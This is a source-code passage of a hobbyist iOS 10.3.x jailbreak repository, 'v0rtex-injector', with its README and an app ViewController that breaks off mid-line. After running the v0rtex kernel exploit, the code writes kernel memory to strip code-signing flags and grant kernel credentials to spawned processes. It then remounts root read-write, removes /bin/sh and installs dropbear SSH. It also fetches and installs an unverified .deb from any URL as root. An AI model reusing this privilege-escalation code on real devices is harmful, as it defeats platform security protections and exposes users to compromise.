├── .gitattributes ├── README.md ├── v0rtex-S ├── .gitattributes ├── AppDelegate.h ├── AppDelegate.m ├── Assets.xcassets │ └── AppIcon.appiconset │ │ ├── Contents.json │ │ ├── ipad.png │ │ ├── ipad@2x.png │ │ ├── iphone@2x.png │ │ └── iphone@3x.png ├── Base.lproj │ ├── LaunchScreen.storyboard │ └── Main.storyboard ├── Info.plist ├── ViewController.h ├── ViewController.m ├── bash ├── bootstrap.tar ├── common.h ├── cydia │ └── jailbreakd.m ├── cydo ├── dropbear ├── extrainst_ ├── kernel.h ├── kernel.m ├── launchctl ├── ls ├── main.m ├── root-rw.h ├── root-rw.m ├── symbols.h ├── symbols.m ├── tar ├── the_super_fun_part │ ├── amfi.h │ ├── amfi.m │ ├── libjb.a │ ├── libjb.h │ ├── patchfinder64.c │ └── patchfinder64.h ├── v0rtex.h └── v0rtex.m └── v0rtex-s.xcodeproj ├── project.pbxproj ├── project.xcworkspace ├── contents.xcworkspacedata └── xcuserdata │ └── jakejames.xcuserdatad │ └── UserInterfaceState.xcuserstate └── xcuserdata └── jakejames.xcuserdatad ├── xcdebugger └── Breakpoints_v2.xcbkptlist └── xcschemes └── xcschememanagement.plist /.gitattributes: -------------------------------------------------------------------------------- 1 | *.tar filter=lfs diff=lfs merge=lfs -text 2 | bootstrap.tar filter=lfs diff=lfs merge=lfs -text 3 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # v0rtex-injector beta 7 2 | 3 | Get v0rtex-injector IPA here (BETA 6): https://github.com/thisiswisy/v0rtex-injector/releases/tag/b6 4 | 5 | DEMO IMAGES: https://i.imgur.com/25jpFZN.jpg & https://i.imgur.com/D6dnjFj.png 6 | 7 | What is this & what does it offer? 8 | 9 | - Install tweaks on iOS 10.3.x (Only tweaks that hook SpringBoard will work, you can't change preferences in settings. gotta do that manually) 10 | - Not a substrate replacement 11 | - For devs & impatient people 12 | - SSH via USB on port 2222 13 | - No-Tweaks mode in case you don't want tweaks 14 | - Patches the AMFI trustcache using xerub's jailbreak library 15 | - Gets read & write access in the system partition using Todesco's rootfs patch 16 | - Has the ability to empower any process with a given name (creds to ninjaprawn) 17 | - The source-code contains a basic jailbreakd to make Cydia temporarily work (creds to cheesecakeufo) 18 | 19 | To install a tweak find link to the deb file, run exploit, paste, click "continue". If you want to just activate current tweaks click ok without entering any link 20 | - **INSTALLING TWEAKS IS 100% SAFE, A respring loop can't happen because I am using modified killall binary instead of what substrate does. tweaks will load ONLY when you respring manually** THIS TOOL IS ON BETA 6 SO FAR AND IS NOT DANGEROUS IN ANY WAY. WILL NOT INTERFERE WITH NEW JAILBREAKS. 21 | 22 | UPDATE: 23 | 24 | My device bootlooped when trying a new bootstrap and I hadn't set a nonce (gotta wait for new tfp0 exploit, luckily it was a 5S I can downgrade once that happens, well by that time a full jailbreak will have been released anyway xd) 25 | 26 | UPDATES will happen but not as frequently. I can't try new stuff to fix the activation issue anymore so I'll just focus on the jailbreakd damon. As of 30.12.2017 Injector uses a better method to find the proc without involving files and pidof. However I can't test it, although it should work just fine. A better jailbreakd which runs in a separate process is being worked on 27 | 28 | ---------------- 29 | NEW IN BETA 7: 30 | 1. Support for iPad Air 2, iPad Mini 3, iPad Mini 4, iPad Pro 10.5" 31 | 2. Added basic jailbreakd daemon (thanks cheesecakeufo) 32 | 3. Cydia can install *some* stuff 33 | 34 | - Jailbreakd will only start with respring disabled 35 | - once you quit the app jailbreakd STOPS and Cydia crashes 36 | 37 | TODO: 38 | 39 | - run jailbreakd in a separate process OR get a proper nosuid patch 40 | - amfid patch (if you're impatient AND on ios 10.3-10.3.2 just run triple_fetch) 41 | - something like PreferenceLoader 42 | - more iPads 43 | 44 | THERE'S NO IPA YET AND WON'T BE TILL EVERYTHING IS FIXED PROPERLY! NON-DEVS: DO NOT USE BETA 7 45 | 46 | IF YOU USE BETA 7 DO NOT REINSTALL/REMOVE Cydia Substrate! IT *MAY* BREAK ALL OF YOUR TWEAKS 47 | 48 | If you did that and tweaks stopped working, run this via SSH: 49 | 50 | rm /Library/MobileSubstrate/DynamicLibraries && mv /var/stash/*/*/DynamicLibraries /Library/MobileSubstrate/DynamicLibraries 51 | 52 | - Respringing via Cydia will unload all of your tweaks 53 | 54 | ----------------------------------- 55 | NEW IN BETA 6: 56 | 57 | 1. Even more devices 58 | 2. exploit updated, now more reliable 59 | 3. tried to fix ~~Fixed~~ the activation screen issue 60 | 4. hopefully fixed the respring panic issue on A9 devices 61 | 5. you can now load tweaks without respring (only some will work properly) and with a different method (again - only some will work properly - for compatibility issues with Method 1) 62 | ------------------------------------------------- 63 | 64 | KNOWN ISSUES: 65 | 66 | - Activation screen each reboot 67 | - iMessage not working 68 | 69 | Possible fixes: 70 | 1. Reset All Settings 71 | 2. Reset All Contents & Settings 72 | 3. Disable passcode 73 | 74 | 75 | NEW IN BETA 5: 76 | 77 | 1. More devices 78 | 2. tweaks load properly 79 | 3. bootstrap extracts properly 80 | 4. bug fixes 81 | 5. added "reset jailbreak" option. use this if you have any issues 82 | ------------- 83 | 84 | HOW TO COMPILE??? 85 | 86 | If you're using Xcode 9: 87 | 1. Open Xcode from an admin account 88 | 2. Find any line where system() is mentioned 89 | 3. CMD + click on system() -> go to definition 90 | 4. Remove the "IOS_PROHIBITED" line or something like that and save the file 91 | 92 | ------------------------------------------------- 93 | 94 | HOW TO FIND DEB LINK???? 95 | - This gives you **LEGAL** debs straight from their original sources: http://ipod-touch-max.ru/cydia/index.php?cat=search&keyword=YOUR_TWEAK_NAME_HERE 96 | 97 | 98 | tweaks tested & confirmed working by me: 99 | 100 | - Cylinder 101 | - Sleek'n'bouncy 10 102 | - DummyPass 103 | - Zeppelin (working as of b4) 104 | - NoSlowAnimations 105 | - RoundDock 106 | 107 | not working: 108 | 109 | - anemone 110 | 111 | 112 | Supported devices: 113 | 114 | - ALL iPhones, iPods on 10.3-10.3.3 115 | - Some iPads (NO IPA YET!) 116 | 117 | 118 | 119 | thanks to s1guza for exploit, stek29 for telling me how to get cydia work, cheesecakeufo for telling stek29 how to get cydia work, xerub for libjb, theninjaprawn for his techniques, PsychoTea, Sticktron (and who worked on his project) for some other stuff, Wisy for hosting on his github & cleaning up code a little bit. 120 | 121 | - Forked from an older version of this: https://github.com/PsychoTea/v0rtex-S 122 | - Got cydo binary from an older version of this: https://github.com/iabem97/topanga 123 | - Got jailbreakd idea from this: https://github.com/iabem97/topanga 124 | - Got a lot of techniques from this: https://github.com/ninjaprawn/ 125 | - Got amfi patch from this: https://github.com/xerub/extra_recipe/tree/kppless 126 | 127 | Mr.Cryptiic: happy now? 128 | 129 | ------ 130 | 131 | brought to you by Jake 132 | -------------------------------------------------------------------------------- /v0rtex-S/.gitattributes: -------------------------------------------------------------------------------- 1 | bootstrap.tar filter=lfs diff=lfs merge=lfs -text 2 | -------------------------------------------------------------------------------- /v0rtex-S/AppDelegate.h: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.h 3 | // v0rtex 4 | // 5 | // Created by Sticktron on 2017-12-07. 6 | // Copyright © 2017 Sticktron. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface AppDelegate : UIResponder 12 | 13 | @property (strong, nonatomic) UIWindow *window; 14 | 15 | 16 | @end 17 | 18 | -------------------------------------------------------------------------------- /v0rtex-S/AppDelegate.m: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.m 3 | // v0rtex 4 | // 5 | // Created by Sticktron on 2017-12-07. 6 | // Copyright © 2017 Sticktron. All rights reserved. 7 | // 8 | 9 | #import "AppDelegate.h" 10 | 11 | @interface AppDelegate () 12 | 13 | @end 14 | 15 | @implementation AppDelegate 16 | 17 | 18 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions { 19 | // Override point for customization after application launch. 20 | return YES; 21 | } 22 | 23 | 24 | - (void)applicationWillResignActive:(UIApplication *)application { 25 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state. 26 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game. 27 | } 28 | 29 | 30 | - (void)applicationDidEnterBackground:(UIApplication *)application { 31 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later. 32 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits. 33 | } 34 | 35 | 36 | - (void)applicationWillEnterForeground:(UIApplication *)application { 37 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background. 38 | } 39 | 40 | 41 | - (void)applicationDidBecomeActive:(UIApplication *)application { 42 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface. 43 | } 44 | 45 | 46 | - (void)applicationWillTerminate:(UIApplication *)application { 47 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:. 48 | } 49 | 50 | 51 | @end 52 | -------------------------------------------------------------------------------- /v0rtex-S/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "iphone", 5 | "size" : "20x20", 6 | "scale" : "2x" 7 | }, 8 | { 9 | "idiom" : "iphone", 10 | "size" : "20x20", 11 | "scale" : "3x" 12 | }, 13 | { 14 | "idiom" : "iphone", 15 | "size" : "29x29", 16 | "scale" : "2x" 17 | }, 18 | { 19 | "idiom" : "iphone", 20 | "size" : "29x29", 21 | "scale" : "3x" 22 | }, 23 | { 24 | "idiom" : "iphone", 25 | "size" : "40x40", 26 | "scale" : "2x" 27 | }, 28 | { 29 | "idiom" : "iphone", 30 | "size" : "40x40", 31 | "scale" : "3x" 32 | }, 33 | { 34 | "size" : "60x60", 35 | "idiom" : "iphone", 36 | "filename" : "iphone@2x.png", 37 | "scale" : "2x" 38 | }, 39 | { 40 | "size" : "60x60", 41 | "idiom" : "iphone", 42 | "filename" : "iphone@3x.png", 43 | "scale" : "3x" 44 | }, 45 | { 46 | "idiom" : "ipad", 47 | "size" : "20x20", 48 | "scale" : "1x" 49 | }, 50 | { 51 | "idiom" : "ipad", 52 | "size" : "20x20", 53 | "scale" : "2x" 54 | }, 55 | { 56 | "idiom" : "ipad", 57 | "size" : "29x29", 58 | "scale" : "1x" 59 | }, 60 | { 61 | "idiom" : "ipad", 62 | "size" : "29x29", 63 | "scale" : "2x" 64 | }, 65 | { 66 | "idiom" : "ipad", 67 | "size" : "40x40", 68 | "scale" : "1x" 69 | }, 70 | { 71 | "idiom" : "ipad", 72 | "size" : "40x40", 73 | "scale" : "2x" 74 | }, 75 | { 76 | "size" : "76x76", 77 | "idiom" : "ipad", 78 | "filename" : "ipad.png", 79 | "scale" : "1x" 80 | }, 81 | { 82 | "size" : "76x76", 83 | "idiom" : "ipad", 84 | "filename" : "ipad@2x.png", 85 | "scale" : "2x" 86 | }, 87 | { 88 | "idiom" : "ipad", 89 | "size" : "83.5x83.5", 90 | "scale" : "2x" 91 | }, 92 | { 93 | "idiom" : "ios-marketing", 94 | "size" : "1024x1024", 95 | "scale" : "1x" 96 | } 97 | ], 98 | "info" : { 99 | "version" : 1, 100 | "author" : "xcode" 101 | } 102 | } -------------------------------------------------------------------------------- /v0rtex-S/Assets.xcassets/AppIcon.appiconset/ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thisiswisy/v0rtex-injector/18a242c97ba0c4d45a553c78ef91cf9145e9e17e/v0rtex-S/Assets.xcassets/AppIcon.appiconset/ipad.png -------------------------------------------------------------------------------- /v0rtex-S/Assets.xcassets/AppIcon.appiconset/ipad@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thisiswisy/v0rtex-injector/18a242c97ba0c4d45a553c78ef91cf9145e9e17e/v0rtex-S/Assets.xcassets/AppIcon.appiconset/ipad@2x.png -------------------------------------------------------------------------------- /v0rtex-S/Assets.xcassets/AppIcon.appiconset/iphone@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thisiswisy/v0rtex-injector/18a242c97ba0c4d45a553c78ef91cf9145e9e17e/v0rtex-S/Assets.xcassets/AppIcon.appiconset/iphone@2x.png -------------------------------------------------------------------------------- /v0rtex-S/Assets.xcassets/AppIcon.appiconset/iphone@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thisiswisy/v0rtex-injector/18a242c97ba0c4d45a553c78ef91cf9145e9e17e/v0rtex-S/Assets.xcassets/AppIcon.appiconset/iphone@3x.png -------------------------------------------------------------------------------- /v0rtex-S/Base.lproj/LaunchScreen.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 31 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | -------------------------------------------------------------------------------- /v0rtex-S/Base.lproj/Main.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 53 | 59 | 60 | 61 | 62 | 63 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 86 | 87 | 88 | 89 | 90 | 96 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | -------------------------------------------------------------------------------- /v0rtex-S/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | $(DEVELOPMENT_LANGUAGE) 7 | CFBundleDisplayName 8 | v0rtex-S 9 | CFBundleExecutable 10 | $(EXECUTABLE_NAME) 11 | CFBundleIdentifier 12 | $(PRODUCT_BUNDLE_IDENTIFIER) 13 | CFBundleInfoDictionaryVersion 14 | 6.0 15 | CFBundleName 16 | $(PRODUCT_NAME) 17 | CFBundlePackageType 18 | APPL 19 | CFBundleShortVersionString 20 | 1.0 21 | CFBundleVersion 22 | 1 23 | LSRequiresIPhoneOS 24 | 25 | UILaunchStoryboardName 26 | LaunchScreen 27 | UIMainStoryboardFile 28 | Main 29 | UIRequiredDeviceCapabilities 30 | 31 | armv7 32 | 33 | UISupportedInterfaceOrientations 34 | 35 | UIInterfaceOrientationPortrait 36 | 37 | UISupportedInterfaceOrientations~ipad 38 | 39 | UIInterfaceOrientationPortrait 40 | UIInterfaceOrientationPortraitUpsideDown 41 | UIInterfaceOrientationLandscapeLeft 42 | UIInterfaceOrientationLandscapeRight 43 | 44 | 45 | NSAppTransportSecurity 46 | 47 | NSAllowsArbitraryLoads 48 | 49 | 50 | 51 | 52 | -------------------------------------------------------------------------------- /v0rtex-S/ViewController.h: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.h 3 | // v0rtex 4 | // 5 | // Created by Sticktron on 2017-12-07. 6 | // Copyright © 2017 Sticktron. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface ViewController : UIViewController 12 | @property (weak, nonatomic) IBOutlet UISwitch *reinstallcydia; 13 | @property (weak, nonatomic) IBOutlet UISwitch *hastweaks; 14 | @property (weak, nonatomic) IBOutlet UISegmentedControl *method; 15 | @property (weak, nonatomic) IBOutlet UISwitch *shallrespring; 16 | @end 17 | 18 | -------------------------------------------------------------------------------- /v0rtex-S/ViewController.m: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.m 3 | // v0rtex 4 | // 5 | // Created by Sticktron on 2017-12-07. 6 | // Copyright © 2017 Sticktron. All rights reserved. 7 | // 8 | 9 | #import "ViewController.h" 10 | 11 | #include "v0rtex.h" 12 | #include "kernel.h" 13 | #include "symbols.h" 14 | #include "root-rw.h" 15 | #include "the_super_fun_part/amfi.h" 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | 23 | task_t tfp0; 24 | kptr_t kslide; 25 | kptr_t kern_ucred; 26 | kptr_t self_proc; 27 | 28 | //get executable path 29 | 30 | char* bundle_path() { 31 | CFBundleRef mainBundle = CFBundleGetMainBundle(); 32 | CFURLRef resourcesURL = CFBundleCopyResourcesDirectoryURL(mainBundle); 33 | int len = 4096; 34 | char* path = malloc(len); 35 | 36 | CFURLGetFileSystemRepresentation(resourcesURL, TRUE, (UInt8*)path, len); 37 | 38 | return path; 39 | } 40 | 41 | //execute 42 | //thanks PsychoTea and whoever worked on his fork of v0rtex 43 | 44 | int execprog(task_t tfp0, uint64_t kslide, uint64_t kern_ucred, const char *prog, const char* args[]) { 45 | if (args == NULL) { 46 | args = (const char **)&(const char*[]){ prog, NULL }; 47 | } 48 | 49 | const char *logfile = [NSString stringWithFormat:@"/v0rtex/logs/%@-%lu", 50 | [[NSMutableString stringWithUTF8String:prog] stringByReplacingOccurrencesOfString:@"/" withString:@"_"], 51 | time(NULL)].UTF8String; 52 | printf("Spawning [ "); 53 | for (const char **arg = args; *arg != NULL; ++arg) { 54 | printf("'%s' ", *arg); 55 | } 56 | printf("] to logfile [ %s ] \n", logfile); 57 | 58 | int rv; 59 | posix_spawn_file_actions_t child_fd_actions; 60 | if ((rv = posix_spawn_file_actions_init (&child_fd_actions))) { 61 | perror ("posix_spawn_file_actions_init"); 62 | return rv; 63 | } 64 | if ((rv = posix_spawn_file_actions_addopen (&child_fd_actions, STDOUT_FILENO, logfile, 65 | O_WRONLY | O_CREAT | O_TRUNC, 0666))) { 66 | perror ("posix_spawn_file_actions_addopen"); 67 | return rv; 68 | } 69 | if ((rv = posix_spawn_file_actions_adddup2 (&child_fd_actions, STDOUT_FILENO, STDERR_FILENO))) { 70 | perror ("posix_spawn_file_actions_adddup2"); 71 | return rv; 72 | } 73 | 74 | pid_t pd; 75 | if ((rv = posix_spawn(&pd, prog, &child_fd_actions, NULL, (char**)args, NULL))) { 76 | printf("posix_spawn error: %d (%s)\n", rv, strerror(rv)); 77 | return rv; 78 | } 79 | 80 | printf("process spawned with pid %d \n", pd); 81 | 82 | #define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */ 83 | #define CS_INSTALLER 0x0000008 /* has installer entitlement */ 84 | #define CS_HARD 0x0000100 /* don't load invalid pages */ 85 | #define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */ 86 | #define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */ 87 | 88 | /* 89 | 1. read 8 bytes from proc+0x100 into self_ucred 90 | 2. read 8 bytes from kern_ucred + 0x78 and write them to self_ucred + 0x78 91 | 3. write 12 zeros to self_ucred + 0x18 92 | */ 93 | 94 | // find_allproc will crash, currently 95 | // please fix 96 | if (kern_ucred != 0) { 97 | int tries = 3; 98 | while (tries-- > 0) { 99 | sleep(1); 100 | uint64_t proc = rk64(tfp0, kslide + 0xFFFFFFF0075E66F0); 101 | while (proc) { 102 | uint32_t pid = rk32_via_tfp0(tfp0, proc + 0x10); 103 | if (pid == pd) { 104 | uint32_t csflags = rk32_via_tfp0(tfp0, proc + 0x2a8); 105 | csflags = (csflags | CS_PLATFORM_BINARY | CS_INSTALLER | CS_GET_TASK_ALLOW) & ~(CS_RESTRICT | CS_HARD); 106 | wk32(tfp0, proc + 0x2a8, csflags); 107 | tries = 0; 108 | 109 | // i don't think this bit is implemented properly 110 | uint64_t self_ucred = rk64(tfp0, proc + 0x100); 111 | uint32_t selfcred_temp = rk32_via_tfp0(tfp0, kern_ucred + 0x78); 112 | wk32(tfp0, self_ucred + 0x78, selfcred_temp); 113 | 114 | for (int i = 0; i < 3; i++) { 115 | wk32(tfp0, self_ucred + 0x18 + (i * sizeof(uint32_t)), 0); 116 | } 117 | 118 | printf("gave elevated perms to pid %d \n", pid); 119 | 120 | // original stuff, rewritten above using v0rtex stuff 121 | // kcall(find_copyout(), 3, proc+0x100, &self_ucred, sizeof(self_ucred)); 122 | // kcall(find_bcopy(), 3, kern_ucred + 0x78, self_ucred + 0x78, sizeof(uint64_t)); 123 | // kcall(find_bzero(), 2, self_ucred + 0x18, 12); 124 | break; 125 | } 126 | proc = rk64(tfp0, proc); 127 | } 128 | } 129 | } 130 | 131 | int status; 132 | waitpid(pd, &status, 0); 133 | printf("'%s' exited with %d (sig %d)\n", prog, WEXITSTATUS(status), WTERMSIG(status)); 134 | 135 | char buf[65] = {0}; 136 | int fd = open(logfile, O_RDONLY); 137 | if (fd == -1) { 138 | perror("open logfile"); 139 | return 1; 140 | } 141 | 142 | printf("contents of %s: \n ------------------------- \n", logfile); 143 | while(read(fd, buf, sizeof(buf) - 1) == sizeof(buf) - 1) { 144 | printf("%s", buf); 145 | } 146 | printf("%s", buf); 147 | printf("\n-------------------------\n"); 148 | 149 | close(fd); 150 | remove(logfile); 151 | 152 | return 0; 153 | } 154 | 155 | int execprog_clean(task_t tfp0, uint64_t kslide, uint64_t kern_ucred, const char *prog, const char* args[]) { 156 | if (args == NULL) { 157 | args = (const char **)&(const char*[]){ prog, NULL }; 158 | } 159 | 160 | int rv; 161 | pid_t pd; 162 | if ((rv = posix_spawn(&pd, prog, NULL, NULL, (char**)args, NULL))) { 163 | printf("posix_spawn error: %d (%s)\n", rv, strerror(rv)); 164 | return rv; 165 | } 166 | 167 | #define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */ 168 | #define CS_INSTALLER 0x0000008 /* has installer entitlement */ 169 | #define CS_HARD 0x0000100 /* don't load invalid pages */ 170 | #define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */ 171 | #define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */ 172 | 173 | /* 174 | 1. read 8 bytes from proc+0x100 into self_ucred 175 | 2. read 8 bytes from kern_ucred + 0x78 and write them to self_ucred + 0x78 176 | 3. write 12 zeros to self_ucred + 0x18 177 | */ 178 | 179 | if (kern_ucred != 0) { 180 | int tries = 3; 181 | while (tries-- > 0) { 182 | sleep(1); 183 | // this needs to be moved to an offset VVVVVVVVVVVVV 184 | uint64_t proc = rk64(tfp0, kslide + 0xFFFFFFF0075E66F0); 185 | while (proc) { 186 | uint32_t pid = rk32_via_tfp0(tfp0, proc + 0x10); 187 | if (pid == pd) { 188 | uint32_t csflags = rk32_via_tfp0(tfp0, proc + 0x2a8); 189 | csflags = (csflags | CS_PLATFORM_BINARY | CS_INSTALLER | CS_GET_TASK_ALLOW) & ~(CS_RESTRICT | CS_HARD); 190 | wk32(tfp0, proc + 0x2a8, csflags); 191 | tries = 0; 192 | 193 | // i don't think this bit is implemented properly 194 | uint64_t self_ucred = rk64(tfp0, proc + 0x100); 195 | uint32_t selfcred_temp = rk32_via_tfp0(tfp0, kern_ucred + 0x78); 196 | wk32(tfp0, self_ucred + 0x78, selfcred_temp); 197 | 198 | for (int i = 0; i < 3; i++) { 199 | wk32(tfp0, self_ucred + 0x18 + (i * sizeof(uint32_t)), 0); 200 | } 201 | 202 | // original stuff, rewritten above using v0rtex stuff 203 | // kcall(find_copyout(), 3, proc+0x100, &self_ucred, sizeof(self_ucred)); 204 | // kcall(find_bcopy(), 3, kern_ucred + 0x78, self_ucred + 0x78, sizeof(uint64_t)); 205 | // kcall(find_bzero(), 2, self_ucred + 0x18, 12); 206 | break; 207 | } 208 | proc = rk64(tfp0, proc); 209 | } 210 | } 211 | } 212 | 213 | int status; 214 | waitpid(pd, &status, 0); 215 | return status; 216 | } 217 | @interface ViewController () 218 | @property (weak, nonatomic) IBOutlet UITextView *outputView; 219 | @property (weak, nonatomic) IBOutlet UIButton *sploitButton; 220 | @end 221 | 222 | @implementation ViewController 223 | 224 | - (void)viewDidLoad { 225 | [super viewDidLoad]; 226 | 227 | self.sploitButton.layer.cornerRadius = 6; 228 | self.outputView.layer.cornerRadius = 6; 229 | 230 | // Attempt to init our offsets 231 | // Disable the run button if no offsets were found 232 | if (!init_symbols()) { 233 | [self writeText:@"Device not supported."]; 234 | [self.sploitButton setHidden:TRUE]; 235 | return; 236 | } 237 | 238 | [self writeText:@"> ready."]; 239 | } 240 | 241 | - (IBAction)runSploitButton:(UIButton *)sender { 242 | if ([self.hastweaks isOn]) { 243 | UIAlertController * alertController = [UIAlertController alertControllerWithTitle: @"Install deb" 244 | message: @"If you want to install a deb, do it now, otherwise leave this blank" 245 | preferredStyle:UIAlertControllerStyleAlert]; 246 | [alertController addTextFieldWithConfigurationHandler:^(UITextField *textField) { 247 | textField.placeholder = @"deb link"; 248 | textField.keyboardType = UIKeyboardTypeDefault; 249 | }]; 250 | 251 | [alertController addAction:[UIAlertAction actionWithTitle:@"Continue" style:UIAlertActionStyleDefault handler:^(UIAlertAction *action) { 252 | NSArray * textfields = alertController.textFields; 253 | UITextField * namefield = textfields[0]; 254 | NSLog(@"%@",namefield.text); 255 | 256 | NSURL *url = [NSURL URLWithString:namefield.text]; 257 | NSData *urlData = [NSData dataWithContentsOfURL:url];//download deb 258 | if (urlData) 259 | { 260 | NSArray *paths = NSSearchPathForDirectoriesInDomains(NSDocumentDirectory, NSUserDomainMask, YES); 261 | NSString *documentsDirectory = [paths objectAtIndex:0]; 262 | NSString *filePath = [NSString stringWithFormat:@"%@/%@", documentsDirectory,@"tweak.deb"]; 263 | [urlData writeToFile:filePath atomically:YES];//save it 264 | sleep(2); 265 | } 266 | [self runsploit]; 267 | 268 | }]]; 269 | [self presentViewController:alertController animated:YES completion:nil]; 270 | } 271 | else { 272 | [self runsploit]; 273 | } 274 | } 275 | - (void)runsploit{ 276 | 277 | // Run v0rtex 278 | [self writeText:@"> running exploit..."]; 279 | 280 | tfp0 = MACH_PORT_NULL; 281 | kslide = 0; 282 | kern_ucred = 0; 283 | self_proc = 0; 284 | 285 | kern_return_t ret = v0rtex(NULL, NULL, &tfp0, &kslide, &kern_ucred, &self_proc); 286 | 287 | if (ret != KERN_SUCCESS) { 288 | [self writeText:@"ERROR: exploit failed"]; 289 | return; 290 | } 291 | 292 | [self writeText:@"exploit succeeded!"]; 293 | 294 | 295 | // Write a test file to var 296 | 297 | [self writeText:@"writing test file..."]; 298 | 299 | extern kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize); 300 | uint32_t magic = 0; 301 | mach_vm_size_t sz = sizeof(magic); 302 | ret = mach_vm_read_overwrite(tfp0, 0xfffffff007004000 + kslide, sizeof(magic), (mach_vm_address_t)&magic, &sz); 303 | LOG("mach_vm_read_overwrite: %x, %s", magic, mach_error_string(ret)); 304 | 305 | FILE *varF = fopen("/var/mobile/test.txt", "w"); 306 | LOG("var file: %p", varF); 307 | if (varF == 0) { 308 | [self writeText:@"ERROR: failed to write test var file"]; 309 | return; 310 | } 311 | 312 | [self writeText:@"wrote test var file!"]; 313 | [self writeText:[NSString stringWithFormat:@"/var/mobile/test.txt (%p)", varF]]; 314 | 315 | 316 | // Remount '/' as r/w 317 | 318 | int remountOutput = mount_root(tfp0, kslide); 319 | LOG("remount: %d", remountOutput); 320 | if (remountOutput != 0) { 321 | [self writeText:@"ERROR: failed to remount '/' as r/w"]; 322 | // return; 323 | } 324 | 325 | [self writeText:@"remounted '/' as r/w"]; 326 | 327 | 328 | // Write a test file to root 329 | 330 | [self writeText:@"writing test root file..."]; 331 | 332 | FILE *rootF = fopen("/test.txt", "w"); 333 | LOG("root file: %p", rootF); 334 | if (rootF == 0) { 335 | [self writeText:@"ERROR: failed to write root test file"]; 336 | // return; 337 | } 338 | 339 | [self writeText:@"wrote test root file!"]; 340 | [self writeText:[NSString stringWithFormat:@"/test.txt (%p)", rootF]]; 341 | 342 | 343 | 344 | // init filemanager n bundlepath 345 | NSFileManager *fileMgr = [NSFileManager defaultManager]; 346 | NSString *bundlePath = [NSString stringWithFormat:@"%s", bundle_path()]; 347 | 348 | { 349 | // remove old files 350 | NSLog(@"removing old files..."); 351 | [fileMgr removeItemAtPath:@"/v0rtex/bins" error:nil]; 352 | [fileMgr removeItemAtPath:@"/v0rtex/bootstrap.tar" error:nil]; 353 | [fileMgr removeItemAtPath:@"/v0rtex/bootstrap2.tar" error:nil]; 354 | [fileMgr removeItemAtPath:@"/v0rtex/dropbear" error:nil]; 355 | [fileMgr removeItemAtPath:@"/v0rtex/start.sh" error:nil]; 356 | [fileMgr removeItemAtPath:@"/v0rtex/tar" error:nil]; 357 | [fileMgr removeItemAtPath:@"/bin/sh" error:nil]; 358 | 359 | // copy in all our bins 360 | NSLog(@"copying bins..."); 361 | 362 | // create v0rtex dirs 363 | mkdir("/v0rtex", 0777); 364 | //mkdir("/v0rtex/bins", 0777); 365 | mkdir("/v0rtex/logs", 0777); 366 | 367 | NSError *error; 368 | [fileMgr copyItemAtPath:[bundlePath stringByAppendingString:@"/bootstrap.tar"] 369 | toPath:@"/v0rtex/bootstrap.tar" error: &error]; 370 | if (error) NSLog(@"Error: %@", error); 371 | 372 | [fileMgr copyItemAtPath:[bundlePath stringByAppendingString:@"/dropbear"] 373 | toPath:@"/v0rtex/dropbear" error: &error]; 374 | if (error) NSLog(@"Error: %@", error); 375 | 376 | [fileMgr copyItemAtPath:[bundlePath stringByAppendingString:@"/tar"] 377 | toPath:@"/v0rtex/tar" error: &error]; 378 | if (error) NSLog(@"Error: %@", error); 379 | 380 | [fileMgr copyItemAtPath:[bundlePath 